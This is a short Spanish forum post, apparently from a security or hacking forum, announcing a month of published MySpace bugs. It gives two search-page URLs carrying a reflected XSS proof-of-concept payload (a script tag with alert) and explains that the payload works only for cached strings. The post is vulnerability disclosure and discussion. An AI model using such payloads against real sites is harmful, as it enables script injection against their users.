En abril se publicaran fallos de myspace de todo tipo, idea original de
http://momby.livejournal.com/ MONDO y MUSTA
Y version española
http://sni-labs.com/MOMBYSe espera que la gente mande esos fallos de myspace q nunca fueron reparados:O. Y por lo que dicen myspace está parcheando todo antes de iniciar el mes
APs otra XSS de myspace publicada por rmrgvg en sni-labs
En el buscador de myspace ante doble "" puesto en el geturl y buscando codigos que se encuentran en su caché, quiere decir que será vulnerable a esto
http://sads.myspace.com/Modules/Search/Pages/Search.aspx?t=tweb&q=""><script>alert('rMrGvG')</script>
La primer se ejecuta porque es un resultado que encuentra, y por qué lo encuentra porque es un resultado que existe en esta web desde hace tiempo
.
Pero no es vulnerable a esto porque esta cadena no existe en ninguna web, podeis hacer la prueba escribiendo la cadena en alguna web y esperar q sus spider la encuentren
http://sads.myspace.com/Modules/Search/Pages/Search.aspx?t=tweb&q=""><script>alert('cadenaqnoexisteensucahe')</script>
BISUSSS !!!
Fuente q luego anelkaos me riñe
http://sni-labs.com
Autor
En línea
